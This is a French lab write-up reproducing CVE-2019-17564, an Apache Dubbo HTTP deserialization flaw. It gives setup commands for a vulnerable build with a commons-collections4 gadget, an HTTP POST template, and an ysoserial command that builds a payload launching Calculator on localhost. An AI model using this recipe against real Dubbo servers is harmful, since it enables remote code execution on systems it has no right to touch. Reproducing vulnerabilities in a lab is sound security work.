
CVE-2019-17564:Vulnérabilité de désérialisation Apache Dubbo
Apache Dubbo est un framework RPC Java open source hautes performances et léger. Il offre trois capacités principales : l'appel de méthode à distance orienté interface, la tolérance aux pannes intelligente et l'équilibrage de charge, ainsi que l'enregistrement et la découverte automatiques des services.
Apache Dubbo prend en charge plusieurs protocoles, le protocole Dubbo étant recommandé officiellement. Une vulnérabilité de désérialisation (CVE-2019-17564) existe dans le protocole HTTP d'Apache Dubbo. La cause principale est qu'une fois le protocole HTTP activé, Apache Dubbo traite incorrectement le corps du message, entraînant une désérialisation non sécurisée. Lorsque des gadgets exploitables sont présents dans le projet, cela peut conduire à une exécution de code à distance.
2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# Renommez zoo_sample.cfg en zoo.cfg dans le répertoire conf
mv zoo_sample.cfg zoo.cfg
# Entrez dans le répertoire bin et démarrez Zookeeper
./zkServer.sh start

git clone https://github.com/apache/dubbo-samples
# Allez dans le répertoire dubbo-samples-http et modifiez pom.xml
vim pom.xml
Modifiez la version de Dubbo vers une version vulnérable.
Ajoutez une dépendance pour importer un gadget déclenchable. Ici, nous importons commons-collections4-4.0.
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>

mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

Payload
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080
paylaod
Ici, nous utilisons ysoserial pour générer le payload.
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
Envoi via Burp Suite.

https://www.mail-archive.com/[email protected]/msg06225.html